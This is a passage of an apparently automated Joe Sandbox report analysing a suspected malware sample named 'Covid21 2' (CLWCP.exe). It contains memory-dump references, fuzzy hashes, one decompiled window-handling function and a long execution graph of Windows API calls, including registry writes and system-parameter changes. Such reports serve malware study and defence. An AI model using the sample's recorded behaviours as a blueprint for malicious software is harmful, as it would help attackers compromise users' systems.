                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: CreateWindowmemset
                                  • String ID: Button
                                  • API String ID: 1730425660-1034594571
                                  • Opcode ID: 2a326e4dee38dddbbbccb22d44a9d37f464de157ceae5085e1f87924d6524471
                                  • Instruction ID: 90da7fe86d05c84136806c6f2a8b258a2b8c23e6b76e78d1d325a15fbfac5b34
                                  • Opcode Fuzzy Hash: 2a326e4dee38dddbbbccb22d44a9d37f464de157ceae5085e1f87924d6524471
                                  • Instruction Fuzzy Hash: FB114FB1400254BFCB119F65DD84D9B3FA9EB49358B10803AFA15B62A1C3398921DFDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405633, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetPropA.USER32(?,PB_ID), ref: 0040563D
                                  • GetWindowLongA.USER32(?,000000F4), ref: 0040564A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: LongPropWindow
                                  • String ID: PB_ID
                                  • API String ID: 2492497586-4173770792
                                  • Opcode ID: bc80105c267a27b94f18659c8247777471abc9b6ed09b397b677faed5a716696
                                  • Instruction ID: 4b51c7437525caf7098411e987da2f63eca9afd693b39002a02a2111251d0336
                                  • Opcode Fuzzy Hash: bc80105c267a27b94f18659c8247777471abc9b6ed09b397b677faed5a716696
                                  • Instruction Fuzzy Hash: CEF05832200209BBCF115FA5EC08D9A7B66EB943A0714843AF909A22B0CB36C820DB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404836, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E00404836(struct HWND__* _a4) {
				struct HWND__* _t5;
				struct HWND__* _t7;

				_t5 = _a4;
				_push(_t5);
				while(1) {
					_t7 = GetParent();
					if(_t7 == 0) {
						break;
					}
					if(GetPropA(_t5, "PB_WindowID") == 0) {
						_t5 = _t7;
						_push(_t7);
						continue;
					}
					break;
				}
				return _t5;
			}





                                  0x00404837
                                  0x00404843
                                  0x00404859
                                  0x0040485b
                                  0x0040485f
                                  0x00000000
                                  0x00000000
                                  0x00404854
                                  0x00404856
                                  0x00404858
                                  0x00000000
                                  0x00404858
                                  0x00000000
                                  0x00404854
                                  0x00404866

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: ParentProp
                                  • String ID: PB_WindowID
                                  • API String ID: 919147419-1508741625
                                  • Opcode ID: e61d771c9100336b98a7d339edf77a3775cb866c4dae224fea0e610acfc27428
                                  • Instruction ID: b6360fad670133492f75da32d3061413dfb7044b1b8f5c3656c8761a87bd68ca
                                  • Opcode Fuzzy Hash: e61d771c9100336b98a7d339edf77a3775cb866c4dae224fea0e610acfc27428
                                  • Instruction Fuzzy Hash: 25D0C2B770136167C221662A5C84E47A6ACAAD4760300C437F701F3351C278CC0082A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Analysis Process: CLWCP.exe PID: 6804 Parent PID: 6616 CLWCP.exeCOMMON

                                  Execution Graph

                                  Execution Coverage:5.2%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:13.4%
                                  Total number of Nodes:1209
                                  Total number of Limit Nodes:65

                                  Graph

                                  execution_graph 33023 415f70 33026 40847c ReadFile 33023->33026 33027 408499 33026->33027 33028 419d30 33032 419d37 33028->33032 33029 419d81 33032->33029 33034 413e14 33032->33034 33037 419cf8 72 API calls 33032->33037 33038 419c78 72 API calls 33032->33038 33039 413d2c 33034->33039 33037->33032 33038->33032 33040 413d36 33039->33040 33041 413d4a 33040->33041 33043 413cb8 72 API calls 33040->33043 33041->33032 33043->33041 33044 415f80 33047 4084a8 WriteFile 33044->33047 33048 4084c5 33047->33048 33049 424840 MulDiv 33060 41b004 33049->33060 33051 42487e 33064 41b0a4 33051->33064 33056 4248c5 33061 41b00a 33060->33061 33062 41b0a4 44 API calls 33061->33062 33063 41b022 33062->33063 33063->33051 33065 41b0b1 33064->33065 33066 41b0cb 33064->33066 33067 41b0c1 33065->33067 33068 41b0b7 RegCloseKey 33065->33068 33070 41b22c 33066->33070 33069 41b074 43 API calls 33067->33069 33068->33067 33069->33066 33072 41b255 33070->33072 33116 4041b4 41 API calls 33070->33116 33074 41b275 33072->33074 33117 40467c 41 API calls 33072->33117 33075 41b297 RegOpenKeyExA 33074->33075 33076 41b2a9 33075->33076 33080 41b2e5 33075->33080 33077 41b2d3 33076->33077 33118 40449c 41 API calls 33076->33118 33119 41b0d0 43 API calls 33077->33119 33082 41b302 RegOpenKeyExA 33080->33082 33081 41b2e0 33124 40411c 33081->33124 33083 41b314 33082->33083 33089 41b34d 33082->33089 33085 41b33e 33083->33085 33120 40449c 41 API calls 33083->33120 33121 41b0d0 43 API calls 33085->33121 33090 41b367 RegOpenKeyExA 33089->33090 33090->33081 33091 41b379 33090->33091 33092 41b3a3 33091->33092 33122 40449c 41 API calls 33091->33122 33092->33081 33123 41b0d0 43 API calls 33092->33123 33095 41b45c 33129 41b434 33095->33129 33098 41b4c5 33100 40411c 41 API calls 33098->33100 33099 41b476 33132 40420c 33099->33132 33103 41b4ba 33100->33103 33102 41b481 33137 41b4d4 33102->33137 33110 41b074 33103->33110 33105 41b499 33106 41b4bc 33105->33106 33108 41b4a5 33105->33108 33149 41af9c 72 API calls 33106->33149 33143 404768 33108->33143 33111 41b0a0 33110->33111 33112 41b07e 33110->33112 33111->33056 33113 41b084 RegFlushKey 33112->33113 33114 41b08a RegCloseKey 33112->33114 33113->33114 33115 40411c 41 API calls 33114->33115 33115->33111 33116->33072 33117->33074 33119->33081 33121->33081 33123->33081 33125 404122 33124->33125 33126 40413d 33124->33126 33125->33126 33128 402704 41 API calls 33125->33128 33126->33056 33126->33095 33128->33126 33150 41b3e4 33129->33150 33131 41b448 33131->33098 33131->33099 33154 4041e0 33132->33154 33134 40421c 33135 40411c 41 API calls 33134->33135 33136 404234 33135->33136 33136->33102 33259 4045dc 33137->33259 33140 41b508 33261 40b928 72 API calls 33140->33261 33141 41b527 33141->33105 33144 404775 33143->33144 33148 4047a5 33143->33148 33146 404781 33144->33146 33147 4041e0 41 API calls 33144->33147 33145 40411c 41 API calls 33145->33146 33146->33103 33147->33148 33148->33145 33149->33103 33151 41b3fd 33150->33151 33152 41b411 RegQueryValueExA 33151->33152 33153 41b428 33152->33153 33153->33131 33155 4041e4 33154->33155 33156 404208 33154->33156 33159 4026e4 33155->33159 33156->33134 33160 4026e9 33159->33160 33163 4026fc 33159->33163 33165 402110 33160->33165 33161 4026ef 33161->33163 33176 4027f4 41 API calls 33161->33176 33163->33134 33166 402124 33165->33166 33167 402129 33165->33167 33177 401a1c RtlInitializeCriticalSection 33166->33177 33169 402156 RtlEnterCriticalSection 33167->33169 33170 402160 33167->33170 33171 402135 33167->33171 33169->33170 33170->33171 33184 40201c 33170->33184 33171->33161 33174 402281 RtlLeaveCriticalSection 33175 40228b 33174->33175 33175->33161 33176->33163 33178 401a40 RtlEnterCriticalSection 33177->33178 33179 401a4a 33177->33179 33178->33179 33180 401a68 LocalAlloc 33179->33180 33181 401a82 33180->33181 33182 401ad1 33181->33182 33183 401ac7 RtlLeaveCriticalSection 33181->33183 33182->33167 33183->33182 33185 40202c 33184->33185 33186 402058 33185->33186 33187 40207c 33185->33187 33190 401f90 33185->33190 33186->33187 33195 401e30 33186->33195 33187->33174 33187->33175 33199 4017dc 33190->33199 33192 401fa0 33193 401fad 33192->33193 33208 401f04 9 API calls 33192->33208 33193->33185 33196 401e85 33195->33196 33197 401e4e 33195->33197 33196->33197 33227 401d80 33196->33227 33197->33187 33205 4017f8 33199->33205 33201 401802 33209 4016c8 33201->33209 33203 40180e 33203->33192 33205->33201 33205->33203 33206 401853 33205->33206 33213 40152c 33205->33213 33221 401428 LocalAlloc 33205->33221 33222 401608 33206->33222 33208->33193 33210 40170e 33209->33210 33211 40172a VirtualAlloc 33210->33211 33212 40173e 33210->33212 33211->33210 33211->33212 33212->33203 33214 40153b VirtualAlloc 33213->33214 33216 401568 33214->33216 33217 40158b 33214->33217 33226 4013e0 LocalAlloc 33216->33226 33217->33205 33219 401574 33219->33217 33220 401578 VirtualFree 33219->33220 33220->33217 33221->33205 33225 401637 33222->33225 33223 401696 33223->33203 33224 40166a VirtualFree 33224->33225 33225->33223 33225->33224 33226->33219 33228 401d96 33227->33228 33229 401e1e 33228->33229 33230 401dc1 33228->33230 33231 401dd5 33228->33231 33229->33197 33240 401990 33230->33240 33233 401990 3 API calls 33231->33233 33234 401dd3 33233->33234 33234->33229 33250 401c5c 9 API calls 33234->33250 33236 401df9 33237 401e13 33236->33237 33251 401cb0 9 API calls 33236->33251 33252 401498 LocalAlloc 33237->33252 33241 4019b6 33240->33241 33249 401a0f 33240->33249 33253 40175c 33241->33253 33245 4019d3 33246 401608 VirtualFree 33245->33246 33247 4019ea 33245->33247 33246->33247 33247->33249 33258 401498 LocalAlloc 33247->33258 33249->33234 33250->33236 33251->33237 33252->33229 33255 401793 33253->33255 33254 4017d3 33257 401428 LocalAlloc 33254->33257 33255->33254 33256 4017ad VirtualFree 33255->33256 33256->33255 33257->33245 33258->33249 33260 4045e0 RegQueryValueExA 33259->33260 33260->33140 33260->33141 33261->33141 33262 44d7e0 33263 44d7eb 33262->33263 33268 44d7fc 33262->33268 33264 44d7f5 33263->33264 33265 44d7fe 33263->33265 33271 44d7bc 33264->33271 33277 44d30c 78 API calls 33265->33277 33269 44d80b 33278 44d30c 78 API calls 33269->33278 33272 44d7de 33271->33272 33273 44d7c8 33271->33273 33272->33268 33279 44cba0 33273->33279 33276 44cba0 78 API calls 33276->33272 33277->33269 33278->33268 33280 44cc39 33279->33280 33281 44cbbe 33279->33281 33280->33276 33282 44cc3b 33281->33282 33287 44cbcc 33281->33287 33283 44d2f4 78 API calls 33282->33283 33283->33280 33284 44cc22 33288 44d2f4 33284->33288 33286 4381c8 72 API calls 33286->33287 33287->33284 33287->33286 33289 44d2fd 33288->33289 33292 44d83c 33289->33292 33291 44d30a 33291->33280 33293 44d853 33292->33293 33294 44d92e 33292->33294 33293->33294 33313 44cdb4 33293->33313 33294->33291 33297 44d8b3 33299 44cdb4 2 API calls 33297->33299 33298 44d88d 33300 44d444 78 API calls 33298->33300 33301 44d8c1 33299->33301 33302 44d89f 33300->33302 33303 44d8c5 33301->33303 33304 44d8eb 33301->33304 33305 44d444 78 API calls 33302->33305 33307 44d444 78 API calls 33303->33307 33316 44d444 33304->33316 33306 44d8b1 33305->33306 33306->33291 33309 44d8d7 33307->33309 33311 44d444 78 API calls 33309->33311 33311->33306 33312 44d444 78 API calls 33312->33306 33328 44cd34 33313->33328 33315 44cdc2 33315->33297 33315->33298 33317 44d46a 33316->33317 33318 44d485 33317->33318 33319 44cd34 2 API calls 33317->33319 33320 44cd34 2 API calls 33318->33320 33319->33318 33321 44d4d5 33320->33321 33340 44d33c 33321->33340 33323 44d4f0 33344 44d1bc 75 API calls 33323->33344 33325 44d521 33326 44cd34 2 API calls 33325->33326 33327 44d52c 33326->33327 33327->33312 33336 43ba58 33328->33336 33330 44cd51 GetWindowLongA 33331 44cd8e 33330->33331 33332 44cd6e 33330->33332 33339 44ccb8 GetWindowLongA 33331->33339 33338 44ccb8 GetWindowLongA 33332->33338 33335 44cd7a 33335->33315 33337 43ba62 33336->33337 33337->33330 33338->33335 33339->33335 33341 44d379 33340->33341 33345 41d170 33341->33345 33343 44d41e 33343->33323 33344->33325 33346 41d174 GetSysColor 33345->33346 33347 41d17f 33345->33347 33346->33347 33347->33343 33348 455280 33349 455296 33348->33349 33354 4552e4 33348->33354 33350 4552ec 33349->33350 33351 45529a 33349->33351 33350->33354 33356 413d2c 72 API calls 33350->33356 33352 4552a3 EnumWindows 33351->33352 33351->33354 33353 4552bc 33352->33353 33352->33354 33359 455210 GetWindow 33352->33359 33353->33354 33355 413d2c 72 API calls 33353->33355 33357 4552d8 ShowOwnedPopups 33355->33357 33358 45532d ShowOwnedPopups 33356->33358 33357->33353 33357->33354 33358->33350 33358->33354 33360 455240 33359->33360 33361 45522a 33359->33361 33363 455245 GetCurrentProcessId 33360->33363 33361->33360 33362 455234 GetWindowThreadProcessId 33361->33362 33362->33363 33364 45524f 33363->33364 33365 44e25c 33366 44e273 33365->33366 33367 44e293 33365->33367 33371 46d2c4 33366->33371 33368 44e2d2 33367->33368 33378 44ecc4 72 API calls 33367->33378 33379 402acc 33371->33379 33376 40411c 41 API calls 33377 46d306 33376->33377 33377->33367 33378->33368 33380 40411c 41 API calls 33379->33380 33381 402ae0 33380->33381 33382 402b02 GetCommandLineA 33381->33382 33383 402ae4 GetModuleFileNameA 33381->33383 33384 402b09 33382->33384 33385 40420c 41 API calls 33383->33385 33388 402b20 33384->33388 33440 4029d0 50 API calls 33384->33440 33386 402b00 33385->33386 33386->33388 33389 46cf80 33388->33389 33390 46cf88 33389->33390 33441 40850c 33390->33441 33392 46d21b 33490 404140 41 API calls 33392->33490 33394 46cfb6 33394->33392 33447 404304 33394->33447 33395 46d235 33397 40411c 41 API calls 33395->33397 33399 46d23d 33397->33399 33399->33376 33401 46d096 33402 402acc 52 API calls 33401->33402 33404 46d0a3 33402->33404 33403 46cfe0 33403->33401 33454 4161a4 33403->33454 33458 415b78 33403->33458 33465 4200cc 33403->33465 33405 46d1f9 33404->33405 33406 402acc 52 API calls 33404->33406 33408 46d203 SystemParametersInfoA SystemParametersInfoA 33405->33408 33407 46d0c2 33406->33407 33409 407d2c 41 API calls 33407->33409 33408->33392 33411 46d0cd 33409->33411 33410 46d029 33468 46cf50 GetWindowsDirectoryA 33410->33468 33413 402acc 52 API calls 33411->33413 33415 46d0ee 33413->33415 33414 46d068 33470 4043e4 33414->33470 33417 407d2c 41 API calls 33415->33417 33420 46d0f9 33417->33420 33418 46d075 33435 4161a4 CloseHandle 33418->33435 33484 420158 33418->33484 33419 46d07e 33421 46cf50 GetWindowsDirectoryA 33419->33421 33422 4026e4 41 API calls 33420->33422 33423 46d086 33421->33423 33424 46d117 33422->33424 33487 404170 41 API calls 33423->33487 33426 4026e4 41 API calls 33424->33426 33428 46d123 RegOpenKeyExA RegOpenKeyExA 33426->33428 33429 46d183 RegSetValueExA RegSetValueExA 33428->33429 33430 46d1af RegSetValueExA RegSetValueExA 33428->33430 33431 46d1d9 RegFlushKey RegCloseKey 33429->33431 33430->33431 33488 402704 41 API calls 33431->33488 33433 46d1f2 33489 402704 41 API calls 33433->33489 33435->33419 33440->33384 33442 4045dc 33441->33442 33443 408526 FindFirstFileA 33442->33443 33444 408531 FindClose 33443->33444 33445 408565 33443->33445 33444->33445 33446 408540 FileTimeToLocalFileTime FileTimeToDosDateTime 33444->33446 33445->33394 33446->33445 33448 40420c 41 API calls 33447->33448 33449 404311 33448->33449 33450 407d2c 33449->33450 33451 407d3a 33450->33451 33452 404768 41 API calls 33451->33452 33453 407d45 33452->33453 33453->33403 33455 4161ab 33454->33455 33456 4161b6 CloseHandle 33455->33456 33457 4161bc 33455->33457 33456->33457 33457->33410 33491 415f90 33458->33491 33460 415ba0 33464 415f90 SetFilePointer 33460->33464 33461 415bb8 33461->33410 33463 415f90 SetFilePointer 33463->33460 33464->33461 33495 415ff8 33465->33495 33467 4200e3 33467->33410 33469 46cf7a 33468->33469 33469->33414 33471 404427 33470->33471 33472 4043e8 33470->33472 33471->33418 33473 404170 33472->33473 33474 4043f2 33472->33474 33480 4041e0 41 API calls 33473->33480 33481 404184 33473->33481 33475 404405 33474->33475 33476 40441c 33474->33476 33477 404768 41 API calls 33475->33477 33478 404768 41 API calls 33476->33478 33483 40440a 33477->33483 33478->33483 33479 4041b2 33479->33418 33480->33481 33481->33479 33531 402704 41 API calls 33481->33531 33483->33418 33485 415ff8 78 API calls 33484->33485 33486 420172 33485->33486 33486->33419 33487->33401 33488->33433 33489->33405 33490->33395 33494 4084d4 SetFilePointer 33491->33494 33493 415b8b 33493->33463 33494->33493 33496 416001 33495->33496 33499 41603c 33496->33499 33498 41601d 33498->33467 33500 416057 33499->33500 33501 4160fc 33500->33501 33502 41607e 33500->33502 33520 408424 33501->33520 33504 416097 CreateFileA 33502->33504 33505 4160a8 33504->33505 33519 4160f5 33505->33519 33524 408828 42 API calls 33505->33524 33506 416106 33506->33519 33527 408828 42 API calls 33506->33527 33510 416121 GetLastError 33528 40b01c 42 API calls 33510->33528 33511 4160bc GetLastError 33525 40b01c 42 API calls 33511->33525 33512 416179 33512->33498 33515 416138 33529 40b928 72 API calls 33515->33529 33516 4160d3 33526 40b928 72 API calls 33516->33526 33530 404140 41 API calls 33519->33530 33521 408477 33520->33521 33522 408438 33520->33522 33521->33506 33522->33521 33523 408471 CreateFileA 33522->33523 33523->33521 33524->33511 33525->33516 33526->33519 33527->33510 33528->33515 33529->33519 33530->33512 33531->33479 33532 41ab68 33536 4554c4 33532->33536 33626 438d5c 33532->33626 33533 41ab7e 33537 45552c 33536->33537 33541 4554fa 33536->33541 33633 455378 33537->33633 33539 413d2c 72 API calls 33539->33541 33540 455537 33542 455547 33540->33542 33543 4555f2 33540->33543 33541->33537 33541->33539 33595 45551b 33541->33595 33546 45554d 33542->33546 33547 455aa8 33542->33547 33544 4555f9 33543->33544 33545 455648 33543->33545 33549 4555ff 33544->33549 33583 455980 33544->33583 33553 455655 33545->33553 33554 455ac2 33545->33554 33558 4555d6 33545->33558 33550 455558 33546->33550 33557 45570b 33546->33557 33669 456824 42 API calls 33547->33669 33555 455606 33549->33555 33556 45562f 33549->33556 33551 4555b5 33550->33551 33552 4555db 33550->33552 33550->33558 33559 455b4c 33551->33559 33560 4555bb 33551->33560 33561 4555e4 33552->33561 33562 455720 33552->33562 33566 455660 33553->33566 33567 455a69 IsIconic 33553->33567 33564 455ae3 33554->33564 33565 455acb 33554->33565 33573 455613 33555->33573 33574 45568a 33555->33574 33555->33595 33556->33558 33576 45595e 33556->33576 33556->33595 33644 45543c NtdllDefWindowProc_A 33557->33644 33558->33595 33640 45543c NtdllDefWindowProc_A 33558->33640 33685 45543c NtdllDefWindowProc_A 33559->33685 33568 4555c4 33560->33568 33599 45585e 33560->33599 33561->33558 33569 455889 33561->33569 33645 455bd0 33562->33645 33671 4562d0 73 API calls 33564->33671 33670 456274 42 API calls 33565->33670 33566->33547 33566->33558 33570 455a7d GetFocus 33567->33570 33567->33595 33578 455b26 33568->33578 33579 4555cd 33568->33579 33593 4558b7 33569->33593 33569->33595 33580 455a8e 33570->33580 33570->33595 33573->33558 33582 455832 SendMessageA 33573->33582 33584 4556a5 33574->33584 33585 45569c 33574->33585 33666 456034 IsWindowEnabled 33576->33666 33672 4409e4 33578->33672 33579->33558 33590 455754 33579->33590 33668 44c664 GetCurrentThreadId 72E7AC10 33580->33668 33582->33595 33583->33595 33598 4559a6 IsWindowEnabled 33583->33598 33641 455bec 92 API calls 33584->33641 33586 4556a3 33585->33586 33587 4556b2 33585->33587 33643 45543c NtdllDefWindowProc_A 33586->33643 33642 455cb0 89 API calls 33587->33642 33650 45543c NtdllDefWindowProc_A 33590->33650 33665 40d158 SetErrorMode LoadLibraryA 33593->33665 33595->33533 33596 455a95 33596->33595 33604 455a9d SetFocus 33596->33604 33598->33595 33606 4559b4 33598->33606 33599->33595 33653 404028 33599->33653 33600 455b38 33683 4553d0 41 API calls 33600->33683 33604->33595 33605 45575a 33610 455777 33605->33610 33611 455799 33605->33611 33617 4559bb IsWindowVisible 33606->33617 33608 455b43 33684 45543c NtdllDefWindowProc_A 33608->33684 33609 4558c6 33613 455915 GetLastError 33609->33613 33614 4558d5 GetProcAddress 33609->33614 33651 4551a4 73 API calls 33610->33651 33652 455144 78 API calls 33611->33652 33613->33595 33614->33595 33618 4558fd 33614->33618 33617->33595 33621 4559c9 GetFocus 33617->33621 33618->33595 33619 45577f PostMessageA 33619->33595 33620 4557a1 PostMessageA 33620->33595 33622 43ba58 33621->33622 33623 4559de SetFocus 33622->33623 33667 435de4 33623->33667 33625 4559fd SetFocus 33625->33595 33913 439164 33626->33913 33629 438d9d 33938 421a00 107 API calls 33629->33938 33631 438da2 33631->33533 33634 45538b 33633->33634 33635 455396 SetThreadLocale 33634->33635 33637 4553a5 33634->33637 33639 4553b5 33634->33639 33686 40c77c 33635->33686 33637->33639 33760 454054 33637->33760 33639->33540 33640->33595 33641->33595 33642->33595 33643->33595 33644->33595 33826 4244d8 33645->33826 33648 455bdf LoadIconA 33649 455beb 33648->33649 33649->33595 33650->33605 33651->33619 33652->33620 33654 40403c 33653->33654 33655 404059 33654->33655 33656 40406a 33654->33656 33848 403f9c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 33655->33848 33841 403db0 33656->33841 33659 404063 33659->33656 33660 404083 33661 4040af FreeLibrary 33660->33661 33662 4040b5 33660->33662 33661->33662 33663 4040ed 33662->33663 33664 4040e2 ExitProcess 33662->33664 33665->33609 33666->33595 33667->33625 33668->33596 33669->33618 33670->33618 33671->33618 33673 4409ec 33672->33673 33674 4409f3 33672->33674 33675 440a1e SystemParametersInfoA 33673->33675 33676 440a2f SendMessageA 33673->33676 33682 4409f1 33673->33682 33677 440a00 33674->33677 33678 440a09 33674->33678 33675->33682 33676->33682 33911 440994 6 API calls 33677->33911 33912 440964 SystemParametersInfoA 33678->33912 33681 440a10 33681->33600 33682->33600 33683->33608 33684->33595 33685->33595 33687 40c784 33686->33687 33687->33687 33778 40c6b8 GetThreadLocale 33687->33778 33691 40c7a4 33692 40c7b2 GetThreadLocale 33691->33692 33787 40b2f4 47 API calls 33691->33787 33788 40b068 42 API calls 33692->33788 33695 40c7cb 33789 404170 33695->33789 33699 40c7ed 33796 40b068 42 API calls 33699->33796 33701 40c811 33797 40b0b4 GetLocaleInfoA 33701->33797 33703 40c82e 33798 40b0b4 GetLocaleInfoA 33703->33798 33705 40c841 33799 40b068 42 API calls 33705->33799 33707 40c85b 33800 40b0b4 GetLocaleInfoA 33707->33800 33709 40c878 33801 40b068 42 API calls 33709->33801 33711 40c892 33802 40b3a4 44 API calls 33711->33802 33713 40c89d 33714 404170 41 API calls 33713->33714 33715 40c8aa 33714->33715 33803 40b068 42 API calls 33715->33803 33717 40c8bf 33804 40b3a4 44 API calls 33717->33804 33719 40c8ca 33720 404170 41 API calls 33719->33720 33721 40c8d7 33720->33721 33805 40b0b4 GetLocaleInfoA 33721->33805 33723 40c8e5 33806 40b068 42 API calls 33723->33806 33725 40c8ff 33726 404170 41 API calls 33725->33726 33727 40c90c 33726->33727 33807 40b068 42 API calls 33727->33807 33729 40c921 33730 404170 41 API calls 33729->33730 33731 40c92e 33730->33731 33732 40411c 41 API calls 33731->33732 33733 40c936 33732->33733 33734 40411c 41 API calls 33733->33734 33735 40c93e 33734->33735 33808 40b068 42 API calls 33735->33808 33737 40c953 33738 40c970 33737->33738 33739 40c961 33737->33739 33810 4041b4 41 API calls 33738->33810 33809 4041b4 41 API calls 33739->33809 33742 40c96e 33811 40b068 42 API calls 33742->33811 33744 40c992 33745 40c9d0 33744->33745 33812 40b068 42 API calls 33744->33812 33815 40449c 41 API calls 33745->33815 33749 40c9b5 33753 40c9d2 33749->33753 33754 40c9c3 33749->33754 33814 4041b4 41 API calls 33753->33814 33813 4041b4 41 API calls 33754->33813 33761 45406d 33760->33761 33762 45409f SystemParametersInfoA 33761->33762 33763 4540b2 CreateFontIndirectA 33762->33763 33764 4540ca GetStockObject 33762->33764 33818 41d838 33763->33818 33766 41d838 46 API calls 33764->33766 33768 4540de SystemParametersInfoA 33766->33768 33769 454132 33768->33769 33770 4540fe CreateFontIndirectA 33768->33770 33823 41d91c 46 API calls 33769->33823 33772 41d838 46 API calls 33770->33772 33774 454117 CreateFontIndirectA 33772->33774 33773 454142 GetStockObject 33775 41d838 46 API calls 33773->33775 33776 41d838 46 API calls 33774->33776 33777 454130 33775->33777 33776->33777 33777->33639 33780 40c6e3 33778->33780 33779 40c72b GetSystemMetrics 33782 40c73a GetSystemMetrics 33779->33782 33780->33779 33781 40c725 33780->33781 33781->33782 33783 40c753 33782->33783 33784 40c74d 33782->33784 33786 40b11c 74 API calls 33783->33786 33816 40c65c GetCPInfo 33784->33816 33786->33691 33787->33692 33788->33695 33790 404174 33789->33790 33793 404184 33789->33793 33792 4041e0 41 API calls 33790->33792 33790->33793 33791 4041b2 33795 40b068 42 API calls 33791->33795 33792->33793 33793->33791 33817 402704 41 API calls 33793->33817 33795->33699 33796->33701 33797->33703 33798->33705 33799->33707 33800->33709 33801->33711 33802->33713 33803->33717 33804->33719 33805->33723 33806->33725 33807->33729 33808->33737 33809->33742 33810->33742 33811->33744 33812->33749 33813->33745 33814->33745 33816->33783 33817->33791 33824 41d3a8 GetObjectA 33818->33824 33820 41d84a 33825 41d5ec 45 API calls 33820->33825 33822 41d853 33822->33768 33823->33773 33824->33820 33825->33822 33829 424514 33826->33829 33830 4244e2 33829->33830 33831 424524 33829->33831 33830->33648 33830->33649 33831->33830 33838 415d70 72 API calls 33831->33838 33833 424543 33833->33830 33834 424550 33833->33834 33835 42455d 33833->33835 33840 41ebc0 72 API calls 33834->33840 33839 41f730 78 API calls 33835->33839 33838->33833 33839->33830 33840->33830 33842 403def 33841->33842 33843 403dbf 33841->33843 33842->33660 33843->33842 33849 41ad00 GetWindowLongA 72E89840 33843->33849 33851 4057f8 33843->33851 33856 4057b4 33843->33856 33860 405d44 33843->33860 33848->33659 33850 41ad1c 33849->33850 33850->33843 33852 4057b4 33851->33852 33854 405800 33851->33854 33853 4057c7 33852->33853 33870 40ce2a 33852->33870 33853->33843 33854->33843 33857 4057c7 33856->33857 33858 4057ba 33856->33858 33857->33843 33859 40ce2a 41 API calls 33858->33859 33859->33857 33861 405d80 33860->33861 33862 405d5d 33860->33862 33861->33843 33890 402be4 33862->33890 33865 402be4 4 API calls 33866 405d71 33865->33866 33867 402be4 4 API calls 33866->33867 33868 405d7b 33867->33868 33897 401ae4 33868->33897 33871 40ce33 33870->33871 33876 40ceb8 GetCurrentThreadId 33871->33876 33873 40ce3e 33874 40ce4a CloseHandle CloseHandle 33873->33874 33875 40ce64 33874->33875 33875->33853 33877 40ced3 33876->33877 33884 40cf38 33876->33884 33886 40ce74 ResetEvent 33877->33886 33879 40ceda 33887 40ccec 41 API calls 33879->33887 33881 40ceeb 33882 40cf31 33881->33882 33888 40cea8 WaitForSingleObject 33881->33888 33889 40ce74 ResetEvent 33882->33889 33884->33873 33886->33879 33887->33881 33888->33881 33889->33884 33891 402bf4 33890->33891 33892 402c23 33890->33892 33891->33892 33894 402bfa 33891->33894 33896 402c21 33892->33896 33910 40286c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33892->33910 33894->33896 33909 40286c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33894->33909 33896->33865 33898 401bc2 33897->33898 33899 401af5 33897->33899 33898->33861 33900 401b16 LocalFree 33899->33900 33901 401b0c RtlEnterCriticalSection 33899->33901 33902 401b49 33900->33902 33901->33900 33903 401b51 33902->33903 33904 401b37 VirtualFree 33902->33904 33905 401b90 33903->33905 33906 401b79 LocalFree 33903->33906 33904->33902 33907 401bb0 RtlDeleteCriticalSection 33905->33907 33908 401ba6 RtlLeaveCriticalSection 33905->33908 33906->33905 33906->33906 33907->33861 33908->33907 33909->33896 33910->33896 33911->33682 33912->33681 33914 439177 33913->33914 33915 4391a4 33913->33915 33916 439243 33914->33916 33917 43917d 33914->33917 33930 43919f 33915->33930 33950 4390b0 74 API calls 33915->33950 33918 435eb4 171 API calls 33916->33918 33920 439320 33917->33920 33921 439196 33917->33921 33917->33930 33928 43924c 33918->33928 33926 439327 GetCapture 33920->33926 33924 4392e8 33921->33924 33921->33930 33922 4392aa 33922->33930 